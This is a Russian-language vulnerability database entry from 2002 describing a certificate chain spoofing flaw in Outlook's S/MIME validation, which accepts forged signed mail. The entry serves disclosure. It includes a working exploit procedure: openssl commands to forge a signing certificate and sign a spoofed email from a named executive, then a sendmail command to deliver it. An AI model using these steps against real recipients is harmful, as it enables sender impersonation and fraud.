Уязвимость в цепочке сертификатов в Outlook

Дата публикации:
04.09.2002
Всего просмотров:
1995
Опасность:
Наличие исправления:
Количество уязвимостей:
1
CVSSv2 рейтинг:
CVE ID:
Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID:
Нет данных
Наличие эксплоита:
Нет данных
Уязвимые продукты:
Описание: Выполнение Outlook's S/MIME уязвимо к нападению подмены сертификатов (certificate chain spoofing attack), несмотря на заявление Microsoft, что IE является единственным уязвимым приложением. Уязвимость позволяют любому подставлять цифровую подпись в электронном сообщении, которую просмотрит Outlook без каких либо предупреждений. Пример:

Атакующий создает некорректную цепочку сертификатов:

[Issuer:VeriSign | Subject:VeriSign] > [Issuer:VeriSign | 
Subject:www.thoughtcrime.org] > [Issuer:www.thoughtcrime.org | 
Subject:Bill Gates/billgates@microsoft.com]
Кроме того, Outlook не в состоянии проверять Основные Ограничения (Basic Constraints) на промежуточный сертификат и принимает такой сертификат как правильный. Уязвимость не делает никакого различия между подписанной и не подписанной электронной почтой в Outlook. Пользователи, которые должны использовать Outlook для подписанных сообщений, должны вручную просмотреть и проверить полученные цепочки сертификатов за последние пять лет. Эксплоит:

  1. Поместите допустимый CA сертификат и секретный ключ в файл "middle.pem".
  2. Создайте поддельный сертификат, подписывая запрос:
    1. openssl genrsa -out key.pem 1024
    2. openssl req -new -key key.pem -out leaf.c
  3. Подпишите CSR с вашим "промежуточным" сертификатом:
    1. openssl x509 -req -in leaf.csr -CA middle.pem -CAkey middle.pem -CAcreateserial -out leaf.pem
  4. Подпишите поддельное E-mail сообщение:
    1. openssl smime -sign -in mail.txt -text -out mail.msg -signer leaf.pem -inkey key.pem -certfile middle.pem -from billgates@microsoft.com -to whomever@wherever.com -subject "SM Exploit"
  5. Пошлите сообщение:
      a) cat mail.msg | sendmail whomever@wherever.com
уязвимость обнаружена в Outlook Express 5

Ссылки: Outlook S/MIME Vulnerability
или введите имя

CAPTCHA